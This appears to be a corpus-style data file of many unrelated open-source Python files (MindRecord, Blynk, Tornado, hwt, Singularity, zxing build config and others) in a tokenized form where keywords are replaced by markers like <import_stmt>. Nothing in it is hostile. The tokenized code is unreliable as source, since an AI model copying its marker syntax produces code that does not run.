<import_stmt>os<import_stmt>uuid<import_from_stmt>mindspore.mindrecord FileWriter FileReader<import_from_stmt>utils get_data<line_sep>MINDRECORD_FILE_NAME="./imagenet.mindrecord"<def_stmt>write_mindrecord_tutorial <block_start>writer=FileWriter(MINDRECORD_FILE_NAME)<line_sep>data=get_data("./ImageNetDataSimulation")<line_sep>schema_json={"file_name":{"type":"string"} "label":{"type":"int64"} "data":{"type":"bytes"}}<line_sep>writer.add_schema(schema_json "img_schema")<line_sep>writer.add_index(["file_name" "label"])<line_sep>writer.write_raw_data(data)<line_sep>writer.commit()<line_sep>reader=FileReader(MINDRECORD_FILE_NAME)<line_sep>count=0<for_stmt>index,x enumerate(reader.get_next())<block_start><assert_stmt>len(x)<eq>3<line_sep>count=count+1<line_sep># print("#item {}: {}".format(index, x))
<block_end><assert_stmt>count<eq>20<line_sep>reader.close()<block_end><if_stmt>__name__<eq>'__main__'<block_start>write_mindrecord_tutorial()<line_sep>os.remove(MINDRECORD_FILE_NAME)<line_sep>os.remove(MINDRECORD_FILE_NAME+".db")<block_end>
|
"""
Blynk is a platform with iOS and Android apps to control
Arduino, Raspberry Pi and the likes over the Internet.
You can easily build graphic interfaces for all your
projects by simply dragging and dropping widgets.
Downloads, docs, tutorials: http://www.blynk.cc
Sketch generator: http://examples.blynk.cc
Blynk community: http://community.blynk.cc
Social networks: http://www.fb.com/blynkapp
http://twitter.com/blynk_app
This example shows how to get UTC time and Timezone info
"""<import_stmt>BlynkLib<import_stmt>time<line_sep>BLYNK_AUTH='<PASSWORD>AuthToken'<line_sep># Initialize Blynk
blynk=BlynkLib.Blynk(BLYNK_AUTH)<line_sep>@blynk.on("connected")<def_stmt>blynk_connected ping<block_start>print('Blynk ready. Ping:' ping 'ms')<line_sep>blynk.send_internal("utc" "time")<line_sep>blynk.send_internal("utc" "tz_name")<block_end>@blynk.on("disconnected")<def_stmt>blynk_disconnected <block_start>print('Blynk disconnected')<block_end>@blynk.on("internal:utc")<def_stmt>on_utc value<block_start><if_stmt>value[0]<eq>"time"<block_start>ts=int(value[1])<floordiv>1000<line_sep># on embedded systems, you may need to subtract time difference between 1970 and 2000
#ts -= 946684800
tm=time.gmtime(ts)<line_sep>print("UTC time: " time.asctime(tm))<block_end><elif_stmt>value[0]<eq>"tz_name"<block_start>print("Timezone: " value[1])<block_end><block_end><while_stmt><true><block_start>blynk.run()<block_end>
|
<import_from_future_stmt> print_function<import_stmt>os<import_stmt>re<import_stmt>subprocess<import_stmt>sys<line_sep>SCRIPT_NAME='script{sys.version_info[0]}{sys.version_info[1]}.rsp'<line_sep>TEMPLATE=r'''python {sys.version_info[0]}.{sys.version_info[1]} {sys.executable}
logs logs
module * {sys.prefix}\Lib\site-packages\{module}\**\*.py
enqueue *
analyze
'''<line_sep>VERSION='.'.join(str(i)<for>i sys.version_info[:2])<if_stmt>len(sys.argv)<l>3<block_start>print('Usage:' sys.argv[0] '<path to AnalysisMemoryTester.exe> <output path>' file=sys.stderr)<line_sep>sys.exit(1)<block_end><if_stmt>sys.version_info[0]<eq>2<block_start><import_stmt>threading<def_stmt>wait p timeout<block_start>t=threading.Timer(timeout p.kill)<line_sep>t.daemon=<true><line_sep>t.start()<line_sep>p.wait()<line_sep>t.cancel()<block_end><block_end><else_stmt><block_start><def_stmt>wait p timeout<block_start>p.wait(timeout)<block_end><block_end>TOOL=os.path.abspath(sys.argv[1])<line_sep>OUTDIR=os.path.abspath(sys.argv[2]<if>len(sys.argv)<g>2<else>'.')<for_stmt>module os.listdir(os.path.join(sys.prefix 'Lib' 'site-packages'))<block_start><if_stmt>module<eq>'__pycache__'<block_start><continue><block_end><if_stmt><not>re.match(r'[a-z0-9_]+$' module re.I)<block_start><continue><block_end>outdir=os.path.join(OUTDIR module)<try_stmt><block_start>os.makedirs(outdir)<block_end><except_stmt>OSError<block_start><if_stmt><not>os.path.isdir(outdir)<block_start><raise><block_end><block_end>script=os.path.join(outdir SCRIPT_NAME.format(sys=sys module=module))<with_stmt>open(script 'w')<as>f<block_start>print(TEMPLATE.format(sys=sys module=module) file=f)<block_end>print("Testing" module)<line_sep>p=subprocess.Popen([TOOL script])<try_stmt><block_start>wait(p 3600)<block_end><except_stmt>KeyboardInterrupt<block_start>p.kill()<line_sep>sys.exit(0)<block_end><except_stmt><block_start>p.kill()<block_end><block_end>
|
<import_from_future_stmt> absolute_import division print_function<import_from_stmt>six.moves range<import_from_stmt>dials.array_family flex<import_from_stmt>libtbx table_utils<import_from_stmt>xfel.merging.application.worker worker<import_from_stmt>xfel.merging.application.reflection_table_utils reflection_table_utils<class_stmt>experiment_resolution_statistics(worker)<block_start>'''Calculates experiments accepted vs resolution bins'''<def_stmt>__init__ self params mpi_helper=<none> mpi_logger=<none><block_start>super(experiment_resolution_statistics self).__init__(params=params mpi_helper=mpi_helper mpi_logger=mpi_logger)<block_end><def_stmt>__repr__ self<block_start><return>'Lattices resolution'<block_end><def_stmt>run self experiments reflections<block_start>self.logger.log_step_time("EXPERIMENT_RESOLUTION_STATS")<line_sep># Get pre-created resolution binning objects from the parameters
self.resolution_binner=self.params.statistics.resolution_binner<line_sep>self.hkl_resolution_bins=self.params.statistics.hkl_resolution_bins<line_sep># How many bins do we have?
self.n_bins=self.resolution_binner.n_bins_all()# (self.params.statistics.n_bins + 2), 2 - to account for the hkls outside of the binner resolution range
# To enable MPI all-rank reduction, every rank must initialize statistics array(s), even if the rank doesn't have any reflections.
self.experiment_count_per_resolution_bins=flex.int(self.n_bins 0)<line_sep># Calculate, format and output statistics for each rank
<if_stmt>reflections.size()<g>0<block_start>self.count_experiments_per_resolution_bins(reflections)<line_sep>Experiment_Table_text=self.get_formatted_table(self.experiment_count_per_resolution_bins len(experiments))<line_sep>self.logger.log(Experiment_Table_text)<block_end># Accumulate statistics from all ranks
all_ranks_experiment_count_per_resolution_bins=self.mpi_helper.cumulative_flex(self.experiment_count_per_resolution_bins flex.int)<line_sep>all_ranks_total_experiment_count=self.mpi_helper.sum(len(experiments))<line_sep># Format and output all-rank total statistics
<if_stmt>self.mpi_helper.rank<eq>0<block_start>Experiment_Table_text=self.get_formatted_table(all_ranks_experiment_count_per_resolution_bins all_ranks_total_experiment_count)<line_sep>self.logger.main_log(Experiment_Table_text)<block_end>self.logger.log_step_time("EXPERIMENT_RESOLUTION_STATS" <true>)<line_sep><return>experiments reflections<block_end><def_stmt>get_formatted_table self experiment_count_per_bin total_experiment_count<block_start>'''Produce a table with experiment count over resolution bins'''<line_sep>table_data=[["Bin" "Resolution Range" "Lattices" "Accepted (%)"]]<for_stmt>i_bin self.resolution_binner.range_used()<block_start>col_legend='%-13s'%self.resolution_binner.bin_legend(i_bin=i_bin show_bin_number=<false> show_bin_range=<false> show_d_range=<true> show_counts=<false>)<line_sep>exp_count_abs='%8d'%experiment_count_per_bin[i_bin]<line_sep>exp_count_percent='%5.2f'%(100.<times>experiment_count_per_bin[i_bin]/total_experiment_count)<line_sep>table_data.append(['%3d'%i_bin col_legend exp_count_abs exp_count_percent])<block_end>table_data.append([""]<times>len(table_data[0]))<line_sep>table_data.append(["All" "" '%8d'%total_experiment_count])<line_sep><return>"\n Image Statistics\n"+table_utils.format(table_data has_header=1 justify='center' delim=' ')<block_end><def_stmt>count_experiments_per_resolution_bins self reflections<block_start>'''For each resolution bin, count experiments that contributed reflections to that bin'''<line_sep># Sort all reflections on asu hkls
self.logger.log_step_time("SORT")<line_sep>self.logger.log("Sorting reflection table...")<line_sep>reflections.sort('miller_index_asymmetric')<line_sep>self.logger.log_step_time("SORT" <true>)<line_sep># Initialize a dictionary to store unique experiment ids in resolution bins
experiments_per_resolution_bins={}<for_stmt>i_bin range(self.n_bins)<block_start>experiments_per_resolution_bins[i_bin]=set()<block_end># Accumulate experiment ids in the resolution bins where those experiments contributed reflections
<for_stmt>refls reflection_table_utils.get_next_hkl_reflection_table(reflections=reflections)<block_start><if_stmt>refls.size()<eq>0<block_start><break># unless the input "reflections" list is empty, generated "refls" lists cannot be empty
<block_end>hkl=refls[0]['miller_index_asymmetric']<if_stmt>hkl<in>self.hkl_resolution_bins<block_start>i_bin=self.hkl_resolution_bins[hkl]<for_stmt>refl refls.rows()<block_start>experiments_per_resolution_bins[i_bin].add(refl['exp_id'])<block_end><block_end><block_end># For each bin, reduce the sets of unique experiment ids to their count
<for_stmt>i_bin range(self.resolution_binner.n_bins_all())<block_start>self.experiment_count_per_resolution_bins[i_bin]=len(experiments_per_resolution_bins[i_bin])<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_from_stmt>xfel.merging.application.worker exercise_worker<line_sep>exercise_worker(experiment_resolution_statistics)<block_end>
|
# encoding: utf-8
"""
Extra capabilities for IPython
"""<line_sep>#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
<import_from_stmt>IPython.lib.security passwd<line_sep>#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
# -*-coding:utf-8-*-
<import_stmt>os<import_stmt>tornado.ioloop<import_stmt>tornado.autoreload<import_from_stmt>webui view<def_stmt>run_server config host=<none> port=7000<block_start>handlers=[(r"/" view.SqlReRuleSetIndex) (r"/sqlreview/rule/simple/addition" view.RuleSimpleAdditoin) (r"/sqlreview/rule/complex/addition" view.RuleComplexAddition) (r"/sqlreview/rule/addition" view.RuleAddition) (r"/new/version/sql/review/rule/info/index" view.SqlReRuleSetInfoIndex) (r"/sqlreview/rule/upload" view.RuleUpload) (r"/sqlreview/rule/info" view.SqlReviewRuleInfo) (r"/new/version/sql/review/get/struct" view.SqlReviewGetStruct) (r"/new/version/sql/review/task/index" view.SqlReviewTaskIndex) (r"/new/version/sql/review/job/data" view.SqlReviewJobData) (r"/new/version/sql/review/task/rule/info" view.SqlReviewTaskRuleInfo) (r"/new/version/sql/review/task/rule/detail/info" view.SqlReviewTaskRuleDetailInfo) (r"/new/version/sql/review/task/rule/plan/info" view.SqlReviewTaskRulePlanInfo) (r"/new/version/sql/review/task/rule/text/info" view.SqlReviewTaskRuleTextInfo) # (r"/new/version/sql/review/prevent/object/index", view.SqlReviewPreventObjectIndex),
# (r"/new/version/sql/review/prevent/object", view.SqlReviewPreventObject),
(r"/new/version/sql/review/get/db/user/list" view.SqlReviewGetDbUserList) (r"/new/version/sql/review/get/db/port" view.SqlReviewGetDbPort) (r"/new/version/sql/review/task/publish" view.SqlReviewTaskPublish) (r"/new/version/sql/review/task/rule/export" view.SqlReviewRuleExport)]<line_sep>application=tornado.web.Application(handlers template_path=os.path.join(os.path.dirname(__file__) "template") static_path=os.path.join(os.path.dirname(__file__) "static") debug=<true> config=config)<line_sep>application.listen(port)<line_sep>tornado.ioloop.IOLoop.instance().start()<block_end><if_stmt>__name__<eq>"__main__"<block_start>application.listen(server_port)<line_sep>tornado.ioloop.IOLoop.instance().start()<block_end>
|
# third party
<import_from_stmt>pytest raises<line_sep># syft absolute
<import_from_stmt>syft.core.common.serde.deserialize _deserialize<def_stmt>test_fail_deserialize_no_format <arrow><none><block_start><with_stmt>raises(TypeError)<block_start>_deserialize(blob="to deserialize" from_proto=<false>)<block_end><block_end><def_stmt>test_fail_deserialize_wrong_format <arrow><none><block_start><with_stmt>raises(TypeError match="You tried to deserialize an unsupported type.")<block_start>_deserialize(blob="to deserialize")<block_end><block_end>
|
<import_stmt>numpy<as>np<import_stmt>ROOT<line_sep>DIR_BOTH=0<line_sep>DIR_UP=1<line_sep>DIR_DOWN=-1<line_sep>NUM_SECTORS=68<line_sep>NUM_SECTORS_Y=14<line_sep># systematics has:
# a dict with coordinate names "X", "Y" as keys
# - each value of these keys is a list/an array of systematic errors for each sector
# - so the list has the length of the number of sectors for that coordinate
# - these errors are quadratically added
# direction, which can be DIR_DOWN, DIR_BOTH, or DIR_UP, depending on whether the error is applied only downward, symmetrically, or only upward
# isRelative, which is a flag telling whether the error is relative to the APE value or absolute
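# Example (hypothetical values, only to illustrate the structure described above):
#   syst = SystematicErrors()
#   syst.getXFromList([0.001] * NUM_SECTORS)     # one x error per sector
#   syst.getYFromList([0.002] * NUM_SECTORS_Y)   # y errors exist only for the first NUM_SECTORS_Y sectors
#   syst.direction.fill(DIR_UP)                  # apply the errors only upwards
#   syst.isRelative.fill(1)                      # treat the errors as relative to the APE value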
<class_stmt>SystematicErrors<block_start><def_stmt>__init__ self<block_start>self.X=np.zeros(NUM_SECTORS)<line_sep>self.Y=np.zeros(NUM_SECTORS)<line_sep># is not made separately for X and Y. If this is wanted, make two separate objects
self.isRelative=np.zeros(NUM_SECTORS dtype=int)<line_sep>self.direction=np.empty(NUM_SECTORS dtype=int)<line_sep>self.direction.fill(DIR_BOTH)<block_end># just so it is clear that the default direction is DIR_BOTH
<def_stmt>__getitem__ self key<block_start><return>getattr(self key)<block_end><def_stmt>getXFromList self X startat=0<block_start><for_stmt>i,x enumerate(X)<block_start>self.X[i+startat]=x<block_end><block_end><def_stmt>getYFromList self Y startat=0<block_start><for_stmt>i,y enumerate(Y)<block_start>self.Y[i+startat]=y<block_end><block_end># each line has the structure: xerr yerr isrel direction
<def_stmt>write self fileName<block_start><with_stmt>open(fileName "w")<as>fi<block_start><for_stmt>x,y,rel,direc zip(self.X self.Y self.isRelative self.direction)<block_start>fi.write("{} {} {} {}\n".format(x y rel direc))<block_end><block_end><block_end><def_stmt>read self fileName<block_start><with_stmt>open(fileName "r")<as>fi<block_start>sector=0<for_stmt>line fi<block_start>x,y,rel,direc=line.rstrip().split(" ")<line_sep>self.X[sector]=float(x)<line_sep>self.Y[sector]=float(y)<line_sep>self.isRelative[sector]=int(rel)<line_sep>self.direction[sector]=int(direc)<line_sep>sector<augadd>1<block_end><block_end><return>self<block_end><block_end>
# returns a SystematicErrors object with values
<def_stmt>apeDifference minuend subtrahend<block_start>fileA=ROOT.TFile(minuend "READ")<line_sep>fileB=ROOT.TFile(subtrahend "READ")<line_sep>apeTreeA_X=fileA.Get("iterTreeX")<line_sep>apeTreeA_X.SetDirectory(0)<line_sep>apeTreeB_X=fileB.Get("iterTreeX")<line_sep>apeTreeB_X.SetDirectory(0)<line_sep>apeTreeA_Y=fileA.Get("iterTreeY")<line_sep>apeTreeA_Y.SetDirectory(0)<line_sep>apeTreeB_Y=fileB.Get("iterTreeY")<line_sep>apeTreeB_Y.SetDirectory(0)<line_sep>fileA.Close()<line_sep>fileB.Close()<line_sep># get to last iteration of each tree
apeTreeA_X.GetEntry(apeTreeA_X.GetEntries()-1)<line_sep>apeTreeB_X.GetEntry(apeTreeB_X.GetEntries()-1)<line_sep>apeTreeA_Y.GetEntry(apeTreeA_Y.GetEntries()-1)<line_sep>apeTreeB_Y.GetEntry(apeTreeB_Y.GetEntries()-1)<line_sep>difference=SystematicErrors()<line_sep>isRel=0<line_sep>direc=0<for_stmt>sector range(1 NUM_SECTORS+1)<block_start>name="Ape_Sector_{}".format(sector)<line_sep>diffX=abs(getattr(apeTreeA_X name)-getattr(apeTreeB_X name))<line_sep>difference.X[sector-1]=diffX<if_stmt>sector<le>NUM_SECTORS_Y<block_start>diffY=abs(getattr(apeTreeA_Y name)-getattr(apeTreeB_Y name))<line_sep>difference.Y[sector-1]=diffY<block_end>difference.isRelative[sector-1]=isRel<line_sep>difference.direction[sector-1]=direc<block_end><return>difference<block_end>
# returns two arrays with values in x and y
<def_stmt>numberOfHits inFileName<block_start>inFile=ROOT.TFile(inFileName "READ")<line_sep>num_x=np.zeros(NUM_SECTORS dtype=int)<line_sep>num_y=np.zeros(NUM_SECTORS dtype=int)<for_stmt>sector range(1 NUM_SECTORS+1)<block_start>xhist=inFile.Get("ApeEstimator1/Sector_{}/Results/h_ResX".format(sector))<line_sep>num_x[sector-1]=xhist.GetEntries()<if_stmt>sector<le>NUM_SECTORS_Y<block_start>yhist=inFile.Get("ApeEstimator1/Sector_{}/Results/h_ResY".format(sector))<line_sep>num_y[sector-1]=yhist.GetEntries()<block_end><block_end>inFile.Close()<line_sep><return>num_x num_y<block_end><def_stmt>main <block_start><pass><block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
|
<import_from_stmt>copy copy<import_from_stmt>typing Optional List<import_from_stmt>hdlConvertorAst.hdlAst HdlStmIf HdlOp HdlOpType HdlValueId HdlModuleDec iHdlStatement<import_from_stmt>hdlConvertorAst.hdlAst._defs HdlIdDef<import_from_stmt>hdlConvertorAst.hdlAst._expr HdlTypeAuto<import_from_stmt>hdlConvertorAst.hdlAst._statements HdlStmProcess HdlStmBlock HdlStmAssign HdlStmWait<import_from_stmt>hdlConvertorAst.to.verilog.keywords IEEE1800_2017_KEYWORDS<import_from_stmt>hdlConvertorAst.translate.common.name_scope LanguageKeyword NameScope<import_from_stmt>hdlConvertorAst.translate.verilog_to_basic_hdl_sim_model.utils hdl_call<import_from_stmt>hwt.hdl.portItem HdlPortItem<import_from_stmt>hwt.hdl.types.array HArray<import_from_stmt>hwt.hdl.types.defs STR INT BOOL<import_from_stmt>hwt.serializer.generic.to_hdl_ast ToHdlAst<import_from_stmt>hwt.serializer.verilog.context SignalTypeSwap<import_from_stmt>hwt.serializer.verilog.ops ToHdlAstVerilog_ops<import_from_stmt>hwt.serializer.verilog.statements ToHdlAstVerilog_statements<import_from_stmt>hwt.serializer.verilog.types ToHdlAstVerilog_types<import_from_stmt>hwt.serializer.verilog.utils SIGNAL_TYPE verilogTypeOfSig<import_from_stmt>hwt.serializer.verilog.value ToHdlAstVerilog_Value<class_stmt>ToHdlAstVerilog(ToHdlAstVerilog_types ToHdlAstVerilog_Value ToHdlAstVerilog_statements ToHdlAstVerilog_ops ToHdlAst)<block_start>_keywords_dict={kw:LanguageKeyword()<for>kw IEEE1800_2017_KEYWORDS}<def_stmt>__init__ self name_scope:Optional[NameScope]=<none><block_start>ToHdlAst.__init__(self name_scope=name_scope)<line_sep>self.signalType=SIGNAL_TYPE.PORT_WIRE<block_end><def_stmt>as_hdl_HdlModuleDef_variable self v types hdl_types hdl_variables processes component_insts<block_start>new_v=copy(v)<with_stmt>SignalTypeSwap(self verilogTypeOfSig(v.origin))<block_start>t=v.type<line_sep># if type requires extra definition
<if_stmt>self.does_type_requires_extra_def(t types)<block_start>_t=self.as_hdl_HdlType(t declaration=<true>)<line_sep>hdl_types.append(_t)<line_sep>types.add(t)<block_end>new_v.type=self.as_hdl_HdlType(t declaration=<false>)<line_sep># this is a array variable which requires value intialization in init
# process
<if_stmt>isinstance(t HArray)<block_start><if_stmt>v.value.vld_mask<block_start>rom=v.origin<line_sep>p=HdlStmProcess()<line_sep>label=self.name_scope.checked_name(rom.name+"_rom_init" p)<line_sep>p.labels.append(label)<line_sep>p.body=HdlStmBlock()<line_sep>body=p.body.body<for_stmt>i,_v enumerate(rom.def_val.val)<block_start>a=HdlStmAssign(self.as_hdl_int(int(_v)) self.as_hdl(rom[i]))<line_sep>a.is_blocking=<true><line_sep>body.append(a)<block_end>w=HdlStmWait()<line_sep>w.val=[]# initial process
body.append(w)<line_sep>processes.append(p)<block_end># because we would not be able to initialize const/localparam variable later
new_v.is_const=<false><line_sep>new_v.value=<none><block_end><elif_stmt>new_v.value<is><not><none><block_start><if_stmt>new_v.value.vld_mask<block_start>new_v.value=self.as_hdl_Value(new_v.value)<block_end><else_stmt># 'x' is a default value no need to specify it extra
<block_start>new_v.value=<none><block_end><block_end><return>new_v<block_end><block_end><def_stmt>_static_assert_false self msg:str<block_start><return>hdl_call(HdlValueId("$error") [f"%m {msg:s}"])<block_end><def_stmt>_static_assert_symbol_eq self symbol_name:str v<block_start>i=HdlStmIf()<line_sep>i.in_preproc=<true><line_sep># [TODO] this actually requires SV>=2009
# generate
# if (p==x) begin
# $error("%m Generated only for this param value");
# end
# endgenerate
i.cond=HdlOp(HdlOpType.NE [HdlValueId(symbol_name) v])<line_sep>i.if_true=hdl_call(HdlValueId("$error") ["%m Generated only for this param value" ])<line_sep><return>i<block_end><def_stmt>as_hdl_GenericItem self g:HdlIdDef<block_start><with_stmt>SignalTypeSwap(self SIGNAL_TYPE.PORT_WIRE)<block_start>new_v=copy(g)<line_sep>v=g.value<if_stmt>v._dtype<eq>STR<or>v._dtype<eq>INT<or>v._dtype<eq>BOOL<block_start>t=HdlTypeAuto<block_end><else_stmt><block_start>t=self.as_hdl_HdlType(v._dtype)<block_end>new_v.type=t<assert_stmt>new_v.value<is><not><none> g<line_sep>new_v.value=self.as_hdl_Value(v)<line_sep><return>new_v<block_end><block_end><def_stmt>as_hdl_HdlPortItem self pi:HdlPortItem<block_start><with_stmt>SignalTypeSwap(self verilogTypeOfSig(pi))<block_start>v=super(ToHdlAstVerilog self).as_hdl_HdlPortItem(pi)<line_sep>v.is_latched=self.signalType<eq>SIGNAL_TYPE.PORT_REG<block_end><return>v<block_end><def_stmt>_as_hdl_HdlModuleDef_param_asserts self new_m:HdlModuleDec<arrow>List[iHdlStatement]<block_start><return>ToHdlAst._as_hdl_HdlModuleDef_param_asserts_real(self new_m)<block_end><block_end>
|
"""Support for executing Docker containers using the Singularity 2.x engine."""<import_stmt>os<import_stmt>os.path<import_from_stmt>subprocess DEVNULL PIPE Popen TimeoutExpired# nosec
<import_from_stmt>typing Optional<line_sep>_USERNS=<none># type: Optional[bool]
<def_stmt>singularity_supports_userns <arrow>bool<block_start>"""Confirm if the version of Singularity install supports the --userns flag."""<line_sep><global>_USERNS# pylint: disable=global-statement
<if_stmt>_USERNS<is><none><block_start><try_stmt><block_start>hello_image=os.path.join(os.path.dirname(__file__) "hello.simg")<line_sep>result=Popen(# nosec
["singularity" "exec" "--userns" hello_image "true"] stderr=PIPE stdout=DEVNULL universal_newlines=<true> ).communicate(timeout=60)[1]<line_sep>_USERNS=("No valid /bin/sh"<in>result<or>"/bin/sh doesn't exist in container"<in>result<or>"executable file not found in"<in>result)<block_end><except_stmt>TimeoutExpired<block_start>_USERNS=<false><block_end><block_end><return>_USERNS<block_end>
|
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
<import_from_stmt>oslo_config cfg<import_from_stmt>stevedore named<line_sep>CONF=cfg.CONF<def_stmt>get_import_plugins **kwargs<block_start>task_list=CONF.image_import_opts.image_import_plugins<line_sep>extensions=named.NamedExtensionManager('glance.image_import.plugins' names=task_list name_order=<true> invoke_on_load=<true> invoke_kwds=kwargs)<for_stmt>extension extensions.extensions<block_start><yield>extension.obj<block_end><block_end>
|
{'includes':['../common.gyp'] 'targets':[{'target_name':'libzxing' 'type':'static_library' 'include_dirs':['core/src' ] 'sources':['core/src/bigint/BigInteger.cc' 'core/src/bigint/BigIntegerAlgorithms.cc' 'core/src/bigint/BigIntegerUtils.cc' 'core/src/bigint/BigUnsigned.cc' 'core/src/bigint/BigUnsignedInABase.cc' 'core/src/zxing/BarcodeFormat.cpp' 'core/src/zxing/Binarizer.cpp' 'core/src/zxing/BinaryBitmap.cpp' 'core/src/zxing/ChecksumException.cpp' 'core/src/zxing/DecodeHints.cpp' 'core/src/zxing/Exception.cpp' 'core/src/zxing/FormatException.cpp' 'core/src/zxing/InvertedLuminanceSource.cpp' 'core/src/zxing/LuminanceSource.cpp' 'core/src/zxing/MultiFormatReader.cpp' 'core/src/zxing/Reader.cpp' 'core/src/zxing/Result.cpp' 'core/src/zxing/ResultIO.cpp' 'core/src/zxing/ResultPoint.cpp' 'core/src/zxing/ResultPointCallback.cpp' 'core/src/zxing/aztec/AztecDetectorResult.cpp' 'core/src/zxing/aztec/AztecReader.cpp' 'core/src/zxing/aztec/decoder/1Decoder.cpp' 'core/src/zxing/aztec/detector/1Detector.cpp' 'core/src/zxing/common/BitArray.cpp' 'core/src/zxing/common/BitArrayIO.cpp' 'core/src/zxing/common/BitMatrix.cpp' 'core/src/zxing/common/BitSource.cpp' 'core/src/zxing/common/CharacterSetECI.cpp' 'core/src/zxing/common/DecoderResult.cpp' 'core/src/zxing/common/DetectorResult.cpp' 'core/src/zxing/common/GlobalHistogramBinarizer.cpp' 'core/src/zxing/common/GreyscaleLuminanceSource.cpp' 'core/src/zxing/common/GreyscaleRotatedLuminanceSource.cpp' 'core/src/zxing/common/GridSampler.cpp' 'core/src/zxing/common/HybridBinarizer.cpp' 'core/src/zxing/common/IllegalArgumentException.cpp' 'core/src/zxing/common/PerspectiveTransform.cpp' 'core/src/zxing/common/Str.cpp' 'core/src/zxing/common/StringUtils.cpp' 'core/src/zxing/common/detector/MonochromeRectangleDetector.cpp' 'core/src/zxing/common/detector/WhiteRectangleDetector.cpp' 'core/src/zxing/common/reedsolomon/GenericGF.cpp' 'core/src/zxing/common/reedsolomon/GenericGFPoly.cpp' 'core/src/zxing/common/reedsolomon/ReedSolomonDecoder.cpp' 'core/src/zxing/common/reedsolomon/ReedSolomonException.cpp' 'core/src/zxing/datamatrix/1Version.cpp' 'core/src/zxing/datamatrix/DataMatrixReader.cpp' 'core/src/zxing/datamatrix/decoder/1BitMatrixParser.cpp' 'core/src/zxing/datamatrix/decoder/1DataBlock.cpp' 'core/src/zxing/datamatrix/decoder/1DecodedBitStreamParser.cpp' 'core/src/zxing/datamatrix/decoder/2Decoder.cpp' 'core/src/zxing/datamatrix/detector/2Detector.cpp' 'core/src/zxing/datamatrix/detector/CornerPoint.cpp' 'core/src/zxing/datamatrix/detector/DetectorException.cpp' 'core/src/zxing/multi/ByQuadrantReader.cpp' 'core/src/zxing/multi/GenericMultipleBarcodeReader.cpp' 'core/src/zxing/multi/MultipleBarcodeReader.cpp' 'core/src/zxing/multi/qrcode/QRCodeMultiReader.cpp' 'core/src/zxing/multi/qrcode/detector/MultiDetector.cpp' 'core/src/zxing/multi/qrcode/detector/MultiFinderPatternFinder.cpp' 'core/src/zxing/oned/CodaBarReader.cpp' 'core/src/zxing/oned/Code128Reader.cpp' 'core/src/zxing/oned/Code39Reader.cpp' 'core/src/zxing/oned/Code93Reader.cpp' 'core/src/zxing/oned/EAN13Reader.cpp' 'core/src/zxing/oned/EAN8Reader.cpp' 'core/src/zxing/oned/ITFReader.cpp' 'core/src/zxing/oned/MultiFormatOneDReader.cpp' 'core/src/zxing/oned/MultiFormatUPCEANReader.cpp' 'core/src/zxing/oned/OneDReader.cpp' 'core/src/zxing/oned/OneDResultPoint.cpp' 'core/src/zxing/oned/UPCAReader.cpp' 'core/src/zxing/oned/UPCEANReader.cpp' 'core/src/zxing/oned/UPCEReader.cpp' 'core/src/zxing/pdf417/PDF417Reader.cpp' 'core/src/zxing/pdf417/decoder/2BitMatrixParser.cpp' 
'core/src/zxing/pdf417/decoder/2DecodedBitStreamParser.cpp' 'core/src/zxing/pdf417/decoder/3Decoder.cpp' 'core/src/zxing/pdf417/decoder/ec/ErrorCorrection.cpp' 'core/src/zxing/pdf417/decoder/ec/ModulusGF.cpp' 'core/src/zxing/pdf417/decoder/ec/ModulusPoly.cpp' 'core/src/zxing/pdf417/detector/3Detector.cpp' 'core/src/zxing/pdf417/detector/LinesSampler.cpp' 'core/src/zxing/qrcode/2Version.cpp' 'core/src/zxing/qrcode/ErrorCorrectionLevel.cpp' 'core/src/zxing/qrcode/FormatInformation.cpp' 'core/src/zxing/qrcode/QRCodeReader.cpp' 'core/src/zxing/qrcode/decoder/2DataBlock.cpp' 'core/src/zxing/qrcode/decoder/3BitMatrixParser.cpp' 'core/src/zxing/qrcode/decoder/3DecodedBitStreamParser.cpp' 'core/src/zxing/qrcode/decoder/4Decoder.cpp' 'core/src/zxing/qrcode/decoder/DataMask.cpp' 'core/src/zxing/qrcode/decoder/Mode.cpp' 'core/src/zxing/qrcode/detector/4Detector.cpp' 'core/src/zxing/qrcode/detector/AlignmentPattern.cpp' 'core/src/zxing/qrcode/detector/AlignmentPatternFinder.cpp' 'core/src/zxing/qrcode/detector/FinderPattern.cpp' 'core/src/zxing/qrcode/detector/FinderPatternFinder.cpp' 'core/src/zxing/qrcode/detector/FinderPatternInfo.cpp' ] 'conditions':[['OS=="win"' {'include_dirs':['core/src/win32/zxing/' ] 'sources':['core/src/win32/zxing/win_iconv.c' ] }] ] } ]}<line_sep>
|
<import_from_stmt>django.conf.urls.defaults patterns url<line_sep>urlpatterns=patterns('users.views' url('^login/$' 'login' name='login') url('^logout/$' 'logout' name='logout') url(r'^find-friends/$' 'find_friends' name='find_friends') url(r'^modify-friend/$' 'modify_friend' name='modify_friend') )<line_sep>
|
# Copyright (c) 2018 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_from_stmt>functools reduce<import_from_stmt>operator mul<def_stmt>sum_aggregation inputs<block_start><return>sum(inputs)<block_end><def_stmt>prod_aggregation inputs<block_start><return>reduce(mul inputs 1)<block_end>str_to_aggregation={'sum':sum_aggregation 'prod':prod_aggregation }<line_sep>
|
# -*- coding: utf-8 -*-
"""
@author: <NAME> <<EMAIL>>
@brief: utils for XGBoost models
